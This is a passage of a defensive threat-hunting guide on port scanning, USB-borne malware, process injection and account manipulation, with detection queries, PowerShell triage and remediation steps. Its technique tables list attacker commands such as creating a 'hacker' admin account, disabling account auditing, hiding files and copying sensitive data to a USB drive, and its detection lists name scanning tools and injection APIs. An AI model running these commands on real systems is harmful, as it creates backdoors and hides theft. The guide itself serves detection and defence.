| where FileName in~ ("nmap.exe", "masscan.exe", "zmap.exe", "netcat.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName
```

**🕵️ Look for SYN Scans**

```kusto
DeviceNetworkEvents
| where Protocol == "TCP"
| where InitiatingProcessFileName contains "nmap"
| where RemotePort between (1 .. 1024)
| summarize ConnectionCount = count() by RemoteIP
| where ConnectionCount > 100
```

**🕵️ Identify Suspicious UDP Traffic**

```kusto
DeviceNetworkEvents
| where Protocol == "UDP"
| where RemotePort between (1 .. 65535)
| summarize ConnectionCount = count() by RemoteIP
| where ConnectionCount > 50
```

***

#### 📊 **Event Viewer Logs**

| **Event ID** | **Description**                   |
| ------------ | --------------------------------- |
| **5156**     | A network connection was allowed. |
| **5152**     | A network connection was blocked. |
| **4625**     | Failed login attempt.             |
| **4688**     | A process was created.            |

**📌 Focus on Event ID 5156:**

* Look for repeated allowed connections from a single **Remote IP** to **many different ports**.
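The same thresholds as the two KQL queries above (more than 50 distinct ports from one remote IP, more than 100 connections to one IP:port pair), applied in Python to allowed-connection records of the Event ID 5156 kind so they can be run offline against an export. This is an added example, not code from the original page; the 5-minute window, the CSV column layout and the sample rows are constructed assumptions.

```python
"""Port-scan triage over allowed-connection records (Event ID 5156 shape).

Added example, not part of the original page: applies the two thresholds from the
KQL queries above to exported records instead of DeviceNetworkEvents. The 5-minute
window and the CSV layout are assumptions; the rows are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, Iterable, List, NamedTuple, Set, Tuple

DISTINCT_PORT_THRESHOLD = 50      # "Detect Network Scanning Behavior" query
CONNECTION_COUNT_THRESHOLD = 100  # "Identify High Frequency Connections" query
WINDOW = timedelta(minutes=5)     # assumption: count distinct ports per 5-minute bucket
EPOCH = datetime(1970, 1, 1)      # bucket boundaries are aligned to this, not to local time


class Conn(NamedTuple):
    time: datetime
    remote_ip: str   # Source Address in a 5156 event
    dest_port: int   # Destination Port in a 5156 event


def parse_5156_csv(lines: Iterable[str]) -> List[Conn]:
    """Parse 'time,remote_ip,dest_port' rows; '#' lines are headers or comments."""
    out: List[Conn] = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, ip, port = line.split(",")
        out.append(Conn(datetime.fromisoformat(ts), ip, int(port)))
    return out


def scanning_sources(conns: Iterable[Conn], window: timedelta = WINDOW,
                     threshold: int = DISTINCT_PORT_THRESHOLD) -> Dict[str, int]:
    """Remote IPs touching more than `threshold` distinct ports inside one window.

    Returns {remote_ip: highest distinct-port count seen in any window}.
    """
    buckets: Dict[Tuple[str, int], Set[int]] = defaultdict(set)
    for c in conns:
        buckets[(c.remote_ip, (c.time - EPOCH) // window)].add(c.dest_port)
    flagged: Dict[str, int] = {}
    for (ip, _), ports in buckets.items():
        if len(ports) > threshold:
            flagged[ip] = max(flagged.get(ip, 0), len(ports))
    return flagged


def high_frequency_pairs(conns: Iterable[Conn],
                         threshold: int = CONNECTION_COUNT_THRESHOLD) -> Dict[Tuple[str, int], int]:
    """(remote_ip, dest_port) pairs with more than `threshold` connections in total."""
    counts: Dict[Tuple[str, int], int] = defaultdict(int)
    for c in conns:
        counts[(c.remote_ip, c.dest_port)] += 1
    return {pair: n for pair, n in counts.items() if n > threshold}


def sample_log() -> List[str]:
    """Constructed rows: one port sweep, one host hammering RDP, one benign SMB client."""
    base = datetime(2024, 1, 15, 9, 0, 0)
    rows = ["# time,remote_ip,dest_port"]
    for i in range(120):   # 10.0.0.7 walks ports 1..120 in two minutes: a sweep
        rows.append(f"{(base + timedelta(seconds=i)).isoformat()},10.0.0.7,{i + 1}")
    for i in range(150):   # 10.0.0.9 connects to 3389 150 times: one port, high frequency
        rows.append(f"{(base + timedelta(seconds=2 * i)).isoformat()},10.0.0.9,3389")
    for i in range(12):    # 10.0.0.5 opens SMB a dozen times over an hour: benign
        rows.append(f"{(base + timedelta(minutes=5 * i)).isoformat()},10.0.0.5,445")
    return rows


if __name__ == "__main__":
    conns = parse_5156_csv(sample_log())
    print("port sweeps:", scanning_sources(conns))
    print("high-frequency pairs:", high_frequency_pairs(conns))
```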

**📌 Focus on Event ID 4688:**

* Identify processes like:
  * `nmap.exe`
  * `masscan.exe`
  * `zmap.exe`

***

### 🕵️ **3. Investigation Techniques**

#### 1️⃣ **Trace the Source IP**

* Identify the attacker’s IP address:

```powershell
netstat -ano | findstr <Suspicious_IP>
```

***

#### 2️⃣ **Inspect Command-Line History**

* Look for scanning tool execution in the session history (`Get-History` covers only the current session; the persistent PSReadLine history file is at `(Get-PSReadLineOption).HistorySavePath`):

```powershell
Get-History | Where-Object { $_.CommandLine -match "nmap|masscan|netcat" }
```

***

#### 3️⃣ **Check Suspicious Processes**

```powershell
Get-Process -Name nmap, masscan, zmap
```

***

#### 4️⃣ **Inspect Firewall Logs**

* Review blocked connection attempts (Event ID 5152, logged only when "Filtering Platform Connection" auditing is enabled; `Get-NetFirewallRule` lists rules, not blocked connections):

```powershell
Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=5152]]"
```

***

#### 5️⃣ **Analyze Network Flows**

* Capture network packets with the built-in tracer (`tcpdump` is not present on Windows); stop the trace once the activity is captured and open the `.etl` in Network Monitor or convert it with `etl2pcapng`:

```powershell
netsh trace start capture=yes tracefile=C:\Temp\scan-capture.etl maxsize=512
netsh trace stop
```

***

### 🔧 **4. Remediation Steps**

#### 📌 **1. Block Suspicious IP Addresses**

```powershell
New-NetFirewallRule -DisplayName "Block Suspicious Scanner" -Direction Inbound -RemoteAddress <Suspicious_IP> -Action Block
```

#### 📌 **2. Disable Unused Services and Ports**

* Unbind the SMB server (`ms_server`, File and Printer Sharing) from an adapter that does not need to serve files:

```powershell
Disable-NetAdapterBinding -Name Ethernet -ComponentID ms_server
```

#### 📌 **3. Terminate Suspicious Processes**

```powershell
Stop-Process -Name "nmap" -Force
```

#### 📌 **4. Enable Firewall Logging**

```powershell
Set-NetFirewallProfile -Profile Domain,Public,Private -LogAllowed True
```

#### 📌 **5. Perform Full Antivirus Scan**

```powershell
Start-MpScan -ScanType FullScan
```

***

### 🛡️ **5. Prevention Steps**

1. **Enable Intrusion Detection System (IDS):**
   * Use **Snort** or **Suricata**.
2. **Implement Rate-Limiting:**
   * Limit the number of connection attempts.
3. **Segment the Network:**
   * Use VLANs and isolated zones.
4. **Disable Unnecessary Services:**
   * Close unused ports and disable unnecessary protocols.
5. **Enable Firewall Rules:**
   * Block unused inbound ports.
6. **Monitor Common Tools:**
   * Alert on tools like **nmap.exe**, **masscan.exe**, **zmap.exe**.

***

### 🧠 **6. Key Takeaways**

* **Scanning is Often the First Step:** Early detection is critical.
* **Monitor Network Traffic:** Look for unusual connection spikes.
* **Control Tools:** Block execution of known scanning tools.
* **Enable IDS/IPS:** Use network monitoring to detect scans.

***

## 🚨 **Replication Through Removable Media: Advanced Threat Analysis**

***

### 🔍 **1. Attack Breakdown**

#### 📝 **What is Replication Through Removable Media?**

* **Replication through removable media** occurs when attackers **use USB drives, external hard drives, or other removable storage devices** to **spread malware or exfiltrate data**.
* Malware is often **automatically executed** using autorun scripts or hidden malicious files.

#### 📑 **Why Attackers Use Removable Media?**

* **Bypass Network Controls:** No reliance on network connectivity.
* **Stealth:** USB drives are less monitored than network transfers.
* **Physical Access:** Effective in air-gapped environments.
* **Persistence:** Can remain undetected and reinfect systems when reconnected.

#### 📌 **Common Techniques for USB-Based Replication**

| **Technique**              | **Description**                                      | **Example Command/Tool**       |
| -------------------------- | ---------------------------------------------------- | ------------------------------ |
| **Autorun Exploitation**   | Malware is automatically executed via `autorun.inf`. | `echo [autorun] > autorun.inf` |
| **Hidden Malicious Files** | Malware is hidden on the USB drive as system files.  | `attrib +s +h malicious.exe`   |
| **Shortcut Abuse**         | Replace folder shortcuts with malicious executables. | `cmd /c start folder.lnk`      |
| **Payload Delivery**       | Malicious payloads transferred manually.             | `copy payload.exe F:\`         |
| **Data Exfiltration**      | Sensitive data copied to the removable device.       | `xcopy C:\sensitive F:\ /E`    |

#### 📌 **Common Malware Examples**

* **USB Rubber Ducky:** Hardware-based key injection.
* **BadUSB:** Firmware-based USB attack.
* **Stuxnet:** Spread through removable drives.
* **Autorun Worms:** Malware exploiting `autorun.inf`.

***

### 🛡️ **2. Detection Techniques**

#### 📊 **Manual Inspection with PowerShell**

**🕵️ List Attached USB Devices**

```powershell
Get-WmiObject -Class Win32_DiskDrive | Where-Object { $_.InterfaceType -eq "USB" } | Select-Object DeviceID, Model, MediaType
```

**🕵️ Check USB Activity in Logs**

```powershell
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-DriverFrameworks-UserMode/Operational'; Id=2003}
```

**🕵️ Search for Autorun Files**

```powershell
Get-ChildItem -Path "F:\" -Filter "autorun.inf" -Recurse -Force
```

**🕵️ Identify Recently Created or Modified Files on USB**

```powershell
Get-ChildItem -Path "F:\" -Recurse | Where-Object { $_.LastWriteTime -gt (Get-Date).AddHours(-24) }
```

***

#### 📊 **Microsoft Defender for Endpoint (MDE) Query (KQL)**

**🕵️ Detect USB Device Connections**

```kusto
// DeviceName is the host name, so it cannot identify USB devices; plug-and-play
// connections are recorded in DeviceEvents with the device details in AdditionalFields
DeviceEvents
| where ActionType == "PnpDeviceConnected"
| extend Pnp = parse_json(AdditionalFields)
| where tostring(Pnp.ClassName) in ("DiskDrive", "USB") or tostring(Pnp.DeviceId) startswith "USBSTOR"
| project Timestamp, DeviceName, DeviceId = tostring(Pnp.DeviceId), ClassName = tostring(Pnp.ClassName), DeviceDescription = tostring(Pnp.DeviceDescription), AccountName
```

**🕵️ Identify Autorun Files**

```kusto
DeviceFileEvents
| where FileName == "autorun.inf"
| where ActionType in ("FileCreated", "FileModified")
| project Timestamp, DeviceName, FileName, FolderPath, AccountName
```

**🕵️ Detect Malware Dropped on USB**

```kusto
DeviceFileEvents
// DeviceFileEvents carries no drive type ("\\" is one backslash, which every path contains);
// a non-system, non-UNC drive letter is the usual proxy for removable media
| where FolderPath !startswith "C:\\" and FolderPath !startswith "\\\\"
| where FileName endswith ".exe" or FileName endswith ".bat"
| where ActionType == "FileCreated"
| project Timestamp, DeviceName, FileName, FolderPath, AccountName
```

**🕵️ Detect Exfiltration Activity**

```kusto
DeviceFileEvents
| where FolderPath !startswith "C:\\" and FolderPath !startswith "\\\\"   // non-system drive letter as the removable-media proxy
| where ActionType == "FileCopied"
| where FileName contains "password" or FileName contains "sensitive"
| project Timestamp, DeviceName, FileName, FolderPath, AccountName
```

**🕵️ Look for Suspicious Processes Executed from USB**

```kusto
DeviceProcessEvents
| where FolderPath !startswith "C:\\" and FolderPath !startswith "\\\\"   // image launched from a non-system drive letter
| where FileName endswith ".exe"
| project Timestamp, DeviceName, ProcessCommandLine, FolderPath, AccountName
```

***

#### 📊 **Event Viewer Logs**

| **Event ID** | **Description**                                |
| ------------ | ---------------------------------------------- |
| **2003**     | USB device connected.                          |
| **4688**     | Process creation (malware execution from USB). |
| **4663**     | Object access attempt (e.g., file copied).     |
| **4670**     | Permissions changed on an object.              |
| **4656**     | Handle to an object was requested.             |

**📌 Focus on Event ID 2003:**

* Tracks **USB device connections**.

**📌 Focus on Event ID 4688:**

* Look for processes executed directly from a USB drive (`F:\malicious.exe`).

**📌 Focus on Event ID 4663:**

* Tracks **file access events**.

***

### 🕵️ **3. Investigation Techniques**

#### 1️⃣ **Identify USB Device Details**

* Check device properties:

```powershell
Get-PnpDevice -Class USB
```

***

#### 2️⃣ **Review USB Device History**

```powershell
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-DriverFrameworks-UserMode/Operational'; Id=2003}
```

***

#### 3️⃣ **Trace Executed Files from USB**

* Identify suspicious execution paths:

```powershell
# -like uses wildcards, not backslash escapes: "[D-Z]:\" matches an executable on any non-system drive letter
Get-EventLog -LogName Security -InstanceId 4688 | Where-Object { $_.Message -like "*[D-Z]:\*.exe*" }
```

***

#### 4️⃣ **Check Recent File Transfers**

* Look for exfiltration patterns:

```powershell
Get-ChildItem -Path "F:\" -Recurse | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-1) }
```

***

#### 5️⃣ **Extract Autorun Configurations**

* Inspect `autorun.inf`:

```powershell
Get-Content -Path "F:\autorun.inf"
```
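Rather than reading the raw file, an analyst can parse the `[autorun]` section and list the entries that would execute something or redirect Explorer's context-menu verbs. This Python triage is an added example, not code from the original page; the file contents are constructed samples and the finding texts are assumptions.

```python
"""Triage of an autorun.inf recovered from removable media.

Added example, not part of the original page: parses the [autorun] section and
reports the entries that would execute a file or redirect Explorer verbs.
The sample file contents are constructed.
"""
import configparser
from typing import Dict, List

# Values of these keys are executed when AutoRun is honoured (which is why the
# remediation above sets NoDriveTypeAutoRun to 255).
LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text: str) -> Dict[str, str]:
    """Return the [autorun] section as lower-cased key -> value; {} if absent."""
    cp = configparser.ConfigParser(strict=False,          # real-world files repeat keys
                                   interpolation=None,    # keep %SystemRoot% literal
                                   delimiters=("=",),     # values contain ':' in paths
                                   allow_no_value=True)
    cp.optionxform = str.lower
    cp.read_string(text)
    if not cp.has_section("autorun"):
        return {}
    return {k: (v or "").strip() for k, v in cp.items("autorun")}


def autorun_findings(entries: Dict[str, str]) -> List[str]:
    """Human-readable reasons the file deserves attention; empty means nothing to flag."""
    findings: List[str] = []
    for key, value in entries.items():
        if not value:
            continue
        if key in LAUNCH_KEYS:
            findings.append(f"{key}= runs {value!r} on insertion")
        elif key == "shell":
            findings.append(f"default Explorer verb changed to {value!r}")
        elif key.startswith("shell\\") and key.endswith("\\command"):
            # shell\<verb>\command= replaces what Open / Explore in the context menu runs
            verb = key.split("\\")[1]
            findings.append(f"context-menu verb {verb!r} redirected to {value!r}")
    return findings


# Constructed sample in the style of an autorun worm: every verb leads to the same binary.
SAMPLE_AUTORUN = r"""[autorun]
; constructed sample, not a real artefact
open=setup.exe
icon=%SystemRoot%\system32\shell32.dll,4
shell\open\command=setup.exe
shell\explore\command=setup.exe
shell=open
action=Open folder to view files
label=USB DISK
"""

# Constructed benign sample: a custom icon and label only.
BENIGN_AUTORUN = "[autorun]\nicon=backup.ico\nlabel=Backup drive\n"


if __name__ == "__main__":
    for name, text in (("sample", SAMPLE_AUTORUN), ("benign", BENIGN_AUTORUN)):
        print(name, autorun_findings(parse_autorun(text)) or ["nothing to flag"])
```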

***

### 🔧 **4. Remediation Steps**

#### 📌 **1. Disable Autorun for Removable Devices**

```powershell
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDriveTypeAutoRun /t REG_DWORD /d 255 /f
```

#### 📌 **2. Quarantine Suspicious Files**

```powershell
Move-Item -Path "F:\malicious.exe" -Destination "C:\Quarantine"
```

#### 📌 **3. Block Malicious Processes**

```powershell
Stop-Process -Name "malicious" -Force
```

#### 📌 **4. Remove Suspicious Autorun Files**

```powershell
Remove-Item -Path "F:\autorun.inf"
```

#### 📌 **5. Perform Full Antivirus Scan**

```powershell
Start-MpScan -ScanType FullScan
```

***

### 🛡️ **5. Prevention Steps**

1. **Disable Autorun:**
   * Prevent automatic execution of files from removable devices.
2. **Restrict USB Access:**
   * Implement policies to restrict USB drive usage.
3. **Enable USB Auditing:**
   * Enable Event Logs for USB activity.
4. **Use Device Control Solutions:**
   * Implement tools like **Microsoft Defender Device Control**.
5. **Encrypt Sensitive Data:**
   * Ensure sensitive data cannot be easily copied to USB devices.
6. **Block Known Malicious Tools:**
   * Block `autorun.inf` and known malicious file extensions via **AppLocker**.
7. **Educate Users:**
   * Train users to avoid connecting unknown USB devices.

***

### 🧠 **6. Key Takeaways**

* **USB Drives Are a Threat Vector:** Monitor USB access and file transfers.
* **Disable Autorun:** Prevent automatic execution of malicious payloads.
* **Audit USB Activity:** Enable detailed logging for USB connections.
* **Use Device Control:** Restrict or block USB usage for unauthorized users.
* **Educate Employees:** Train them on risks associated with USB drives.

***

## 🚨 **Process Injection**

***

### 🔍 **1. Attack Breakdown**

#### 📝 **What is Process Injection?**

* **Process Injection** is a technique used by attackers to **inject malicious code into legitimate processes** to:
  * **Evade Detection:** Hide within trusted processes (e.g., `explorer.exe`, `svchost.exe`).
  * **Privilege Escalation:** Execute code with higher privileges.
  * **Persistence:** Maintain access even after reboots.
  * **Bypass Security Controls:** Avoid antivirus or endpoint protection detection.

#### 📑 **Why Attackers Use Process Injection?**

* **Stealth:** Operate within trusted processes.
* **Access:** Leverage the privileges of the injected process.
* **Bypass Controls:** Avoid application whitelisting.
* **Persistence:** Maintain presence across sessions.

***

#### 📌 **Common Techniques for Process Injection**

| **Technique**                  | **Description**                                  | **Tool Example**              |
| ------------------------------ | ------------------------------------------------ | ----------------------------- |
| **DLL Injection**              | Inject malicious DLLs into legitimate processes. | `rundll32.exe`                |
| **Process Hollowing**          | Replace a process's memory with malicious code.  | `svchost.exe`                 |
| **APC Injection**              | Use Asynchronous Procedure Calls for injection.  | `Mimikatz`                    |
| **Thread Execution Hijacking** | Hijack an existing thread for malicious code.    | `Metasploit`                  |
| **Reflective DLL Injection**   | Load DLLs directly into memory.                  | `Cobalt Strike`               |
| **Shellcode Injection**        | Inject and execute raw shellcode in a process.   | `Metasploit`, `Cobalt Strike` |

***

#### 📊 **Common Tools for Process Injection**

| **Tool**           | **Purpose**                       |
| ------------------ | --------------------------------- |
| **Metasploit**     | Payload generation and injection  |
| **Mimikatz**       | Credential dumping with injection |
| **Cobalt Strike**  | Post-exploitation framework       |
| **PowerSploit**    | PowerShell exploitation scripts   |
| **Process Hacker** | Process analysis and injection    |

***

### 🛡️ **2. Detection Techniques**

#### 📊 **Manual Inspection with PowerShell**

**🕵️ List Suspicious Processes**

```powershell
Get-Process | Where-Object { $_.Path -like "*Temp*" }
```

**🕵️ Check Suspicious DLL Injections**

```powershell
Get-Process -Module | Where-Object { $_.ModuleName -like "*.dll" -and $_.FileName -like "*Temp*" }
```

**🕵️ Inspect Threads in Processes**

```powershell
Get-CimInstance Win32_Process | Select-Object ProcessId, Name, CommandLine, ParentProcessId
```

**🕵️ Check Remote Thread Creation**

* Security Event ID 4688 records process creation only and its message never contains `CreateRemoteThread`; remote thread creation is logged by **Sysmon Event ID 8** when Sysmon is installed:

```powershell
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational'; Id=8} | Select-Object TimeCreated, Message
```

***

#### 📊 **Microsoft Defender for Endpoint (MDE) Query (KQL)**

**🕵️ Detect DLL Injection**

```kusto
DeviceFileEvents
| where FileName endswith ".dll"
| where FolderPath contains "Temp" or FolderPath contains "AppData"
| project Timestamp, DeviceName, FileName, FolderPath, AccountName, InitiatingProcessCommandLine
```

**🕵️ Detect Remote Thread Creation**

```kusto
// API names do not appear in command lines; MDE records the call itself in DeviceEvents
DeviceEvents
| where ActionType == "CreateRemoteThreadApiCall"
| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessId, AccountName
```

**🕵️ Identify Hollowed Processes**

```kusto
DeviceProcessEvents
| where InitiatingProcessCommandLine contains "svchost.exe"
| where ProcessCommandLine contains "explorer.exe" or ProcessCommandLine contains "cmd.exe"
| project Timestamp, DeviceName, ProcessCommandLine, InitiatingProcessCommandLine, AccountName
```

**🕵️ Detect Reflective DLL Injection**

```kusto
DeviceProcessEvents
| where ProcessCommandLine contains "rundll32.exe"
| where ProcessCommandLine contains "LoadLibrary"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

**🕵️ Monitor Suspicious Thread Creation**

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName contains "powershell.exe" or InitiatingProcessFileName contains "cmd.exe"
| where ProcessCommandLine contains "VirtualAlloc" or ProcessCommandLine contains "WriteProcessMemory"
| project Timestamp, DeviceName, ProcessCommandLine, AccountName
```

***

#### 📊 **Event Viewer Logs**

| **Event ID** | **Description**                                  |
| ------------ | ------------------------------------------------ |
| **4688**     | Process creation (Look for `CreateRemoteThread`) |
| **4689**     | Process termination                              |
| **4697**     | Service installed on a system                    |
| **4720**     | An account was created                           |

**📌 Focus on Event ID 4688:**

* Look for:

  ```text
  ProcessName: rundll32.exe, svchost.exe, powershell.exe
  CommandLine: CreateRemoteThread, VirtualAlloc, WriteProcessMemory
  ```
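The 4688 triage above as a repeatable script (an added example, not code from the original page): it reads the Security log, matches the image names and command-line strings just listed, and decodes any `-EncodedCommand` payload so the script body can be searched too. The indicator lists are constructed for illustration.

```powershell
# Added example (not from the original page): scan 4688 events for the indicators listed above
# and decode any -EncodedCommand payload. CommandLine is only populated when the policy
# "Include command line in process creation events" is enabled. Indicator lists are constructed.
$SuspiciousImages = @('rundll32.exe', 'svchost.exe', 'powershell.exe')
$SuspiciousTokens = @('CreateRemoteThread', 'VirtualAlloc', 'WriteProcessMemory')

function Get-EventDataValue {
    # Read one named EventData field from an event record's XML.
    param([System.Diagnostics.Eventing.Reader.EventLogRecord]$Event, [string]$Name)
    $xml = [xml]$Event.ToXml()
    ($xml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}
function ConvertFrom-EncodedCommand {
    # Decode a -EncodedCommand argument (Base64 of UTF-16LE text); $null when absent or malformed.
    param([string]$CommandLine)
    if ($CommandLine -match '-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)') {
        try { return [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Matches[1])) }
        catch { return $null }
    }
    return $null
}
function Test-SuspiciousProcessCreation {
    # Return the indicators matched by one image/command-line pair; no output means no match.
    param([string]$NewProcessName, [string]$CommandLine)
    $hits = @(); $image = [IO.Path]::GetFileName("$NewProcessName")
    if ($SuspiciousImages -contains $image) { $hits += "image:$image" }
    $decoded = ConvertFrom-EncodedCommand $CommandLine
    $text = "$CommandLine $decoded"   # search the decoded script body as well as the raw command line
    foreach ($t in $SuspiciousTokens) { if ($text -match [regex]::Escape($t)) { $hits += "token:$t" } }
    if ($decoded) { $hits += 'encoded-command' }
    return $hits
}
# Live run over the Security log; each hit becomes an object that Export-Csv or a SIEM can consume.
Get-WinEvent -FilterHashtable @{LogName = 'Security'; Id = 4688} -ErrorAction SilentlyContinue |
    ForEach-Object {
        $image = Get-EventDataValue $_ 'NewProcessName'
        $cmd   = Get-EventDataValue $_ 'CommandLine'
        $hits  = @(Test-SuspiciousProcessCreation $image $cmd)
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time       = $_.TimeCreated
                Image      = $image
                Parent     = Get-EventDataValue $_ 'ParentProcessName'   # present on Windows 10 / Server 2016 and later
                User       = Get-EventDataValue $_ 'SubjectUserName'
                Indicators = $hits -join ','
                Decoded    = ConvertFrom-EncodedCommand $cmd
            }
        }
    }
```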

**📌 Focus on Event ID 4697:**

* Look for unusual services created with suspicious paths.

***

### 🕵️ **3. Investigation Techniques**

#### 1️⃣ **Trace Injected Processes**

* Identify suspicious child-parent process relationships:

```powershell
Get-CimInstance Win32_Process | Where-Object { $_.ParentProcessId -eq <PID> }
```

***

#### 2️⃣ **Analyze DLL Loading Paths**

* Verify DLL paths:

```powershell
Get-Process -Module | Where-Object { $_.ModuleName -like "*.dll" }
```

***

#### 3️⃣ **Monitor Memory Activity**

* Look for unexpected memory allocation:

```powershell
Get-Process -Name svchost | Select-Object Handles, NPM, PM, WS
```

***

#### 4️⃣ **Check Running Threads**

* Identify unusual thread activity:

```powershell
Get-Process -Id <PID> | Select-Object Threads
```

***

#### 5️⃣ **Review Command-Line Activity**

* Check for encoded or suspicious PowerShell commands:

```powershell
# Select-String on event objects would match their type name, not the message text, so filter on .Message
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | Where-Object { $_.Message -like "*EncodedCommand*" }
```
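The five investigation steps above combined into one triage function (an added example, not code from the original page). `$WritablePaths` is an assumed list of locations that system binaries are not expected to load modules from; the function walks the parent chain, checks loaded modules and their Authenticode status, reports thread and memory figures, and flags encoded command lines anywhere in the ancestry.

```powershell
# Added example (not from the original page): run steps 1-5 above against one PID in a single
# function. $WritablePaths is an assumed list; run elevated, since module and thread data of
# other users' processes needs it.
$WritablePaths = @('\Temp\', '\AppData\', '\ProgramData\', '\Users\Public\')

function Get-ProcessAncestry {
    # Step 1: walk ParentProcessId upward until the chain ends or repeats (guards against PID reuse).
    param([int]$Id)
    $chain = @(); $seen = @{}
    while ($Id -and -not $seen.ContainsKey($Id)) {
        $seen[$Id] = $true
        $p = Get-CimInstance Win32_Process -Filter "ProcessId = $Id"
        if (-not $p) { break }
        $chain += [pscustomobject]@{ Pid = $p.ProcessId; Name = $p.Name; CommandLine = $p.CommandLine }
        $Id = $p.ParentProcessId
    }
    return $chain
}

function Get-InjectionTriage {
    param([Parameter(Mandatory)][int]$Id)
    $proc = Get-Process -Id $Id -ErrorAction Stop
    # Step 2: modules loaded from user-writable paths, with their Authenticode status.
    $oddModules = @(foreach ($m in $proc.Modules) {
        if ($WritablePaths | Where-Object { $m.FileName -like "*$_*" }) {
            $sig = Get-AuthenticodeSignature -FilePath $m.FileName -ErrorAction SilentlyContinue
            [pscustomobject]@{ Module = $m.FileName; Signature = $sig.Status }
        }
    })
    # Step 5: any ancestor started with an encoded PowerShell command line.
    $ancestry = @(Get-ProcessAncestry $Id)
    $encoded  = $ancestry | Where-Object { $_.CommandLine -match '-(e|ec|enc|encodedcommand)\s' }
    [pscustomobject]@{
        Pid            = $Id
        Name           = $proc.ProcessName
        Ancestry       = ($ancestry | ForEach-Object { "$($_.Name)($($_.Pid))" }) -join ' <- '
        ThreadCount    = $proc.Threads.Count                         # step 4: compare with a known-good host
        WorkingSetMB   = [math]::Round($proc.WorkingSet64 / 1MB, 1)  # step 3
        OddModules     = $oddModules
        EncodedCmdLine = [bool]$encoded
    }
}

# Usage: Get-InjectionTriage -Id 1234 | Format-List
```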

***

### 🔧 **4. Remediation Steps**

#### 📌 **1. Kill Malicious Processes**

```powershell
Stop-Process -Id <PID> -Force
```

#### 📌 **2. Quarantine Malicious DLLs**

```powershell
Move-Item -Path "C:\Temp\malicious.dll" -Destination "C:\Quarantine"
```

#### 📌 **3. Disable Suspicious Services**

```powershell
Stop-Service -Name "suspiciousService"
Set-Service -Name "suspiciousService" -StartupType Disabled   # stopping alone leaves it able to restart at boot
```

#### 📌 **4. Remove Malicious Threads**

* Terminate injected threads manually.

#### 📌 **5. Enable Advanced Threat Protection (ATP)**

* Ensure real-time protection is active.

#### 📌 **6. Perform Full Antivirus Scan**

```powershell
Start-MpScan -ScanType FullScan
```

***

### 🛡️ **5. Prevention Steps**

1. **Enable Process Auditing:**
   * Enable **Event ID 4688** and **4697**.
2. **Use Application Control:**
   * Block suspicious binaries (`rundll32.exe`, `powershell.exe`) from abnormal execution paths.
3. **Enable Windows Defender ATP:**
   * Ensure advanced threat protection is enabled.
4. **Monitor Memory Allocation:**
   * Use tools like **Sysmon** to track thread and memory injection.
5. **Disable Unused Tools:**
   * Restrict access to **rundll32.exe** and **svchost.exe**.
6. **Educate Users:**
   * Raise awareness about malicious file execution.

***

### 🧠 **6. Key Takeaways**

* **Process Injection is Stealthy:** It allows attackers to hide malicious code in legitimate processes.
* **Monitor Process Tree Anomalies:** Look for unusual parent-child relationships.
* **Focus on Memory Behavior:** Techniques like **VirtualAlloc** and **WriteProcessMemory** are common.
* **Enable Security Auditing:** Log **Event IDs 4688, 4697**, and **4689**.

***

## 🚨 **Account Manipulation**

***

### 🔍 **1. Attack Breakdown**

#### 📝 **What is Account Manipulation?**

* **Account Manipulation** refers to the **modification of user accounts** in an operating system or directory service, often with malicious intent.
* Attackers manipulate accounts to:
  * **Maintain Persistence:** Create or modify accounts for long-term access.
  * **Escalate Privileges:** Grant higher privileges to standard accounts.
  * **Evade Detection:** Disable logging or lock out legitimate administrators.
  * **Create Backdoors:** Add unauthorized accounts for fallback access.

***

#### 📑 **Why Attackers Use Account Manipulation?**

* **Stealth Persistence:** Stay undetected while maintaining access.
* **Privilege Escalation:** Gain admin or system-level access.
* **Disable Security Controls:** Turn off auditing or account policies.
* **Lateral Movement:** Use compromised accounts to move across systems.

***

#### 📌 **Common Techniques for Account Manipulation**

| **Technique**                  | **Description**                   | **Example Command**                                             |
| ------------------------------ | --------------------------------- | --------------------------------------------------------------- |
| **Create New Account**         | Add a new local user.             | `net user hacker Pass123! /add`                                 |
| **Add Account to Admin Group** | Grant administrative privileges.  | `net localgroup Administrators hacker /add`                     |
| **Modify Account Properties**  | Enable disabled accounts.         | `net user Administrator /active:yes`                            |
| **Change Passwords**           | Change account passwords.         | `net user Administrator NewPass123!`                            |
| **Disable Security Controls**  | Turn off account auditing.        | `auditpol /set /category:"Account Management" /success:disable` |
| **Modify Service Accounts**    | Change account used by a service. | `sc config TrustedInstaller obj= .\hacker`                      |

***

#### 📊 **Common Tools for Account Manipulation**

| **Tool**                                        | **Purpose**                                 |
| ----------------------------------------------- | ------------------------------------------- |
| **Net User**                                    | Create and modify user accounts.            |
| **PowerShell**                                  | Script account changes.                     |
| **Mimikatz**                                    | Extract and manipulate account credentials. |
| **Windows Management Instrumentation (WMI)**    | Modify accounts remotely.                   |
| **Active Directory Users and Computers (ADUC)** | Graphical account management.               |

***

### 🛡️ **2. Detection Techniques**

#### 📊 **Manual Inspection with PowerShell**

**🕵️ List Local User Accounts**

```powershell
Get-LocalUser
```

**🕵️ Check Accounts Added to Admin Groups**

```powershell
Get-LocalGroupMember -Group "Administrators"
```

**🕵️ Review Recently Created Accounts**

```powershell
# Get-LocalUser exposes no creation time; PasswordLastSet is set when the account is created
# (and on every reset), so it is the closest local proxy. Event ID 4720 gives the exact creation time.
Get-LocalUser | Where-Object { $_.PasswordLastSet -gt (Get-Date).AddDays(-7) }
```

**🕵️ Check for Modified Account Policies**

```powershell
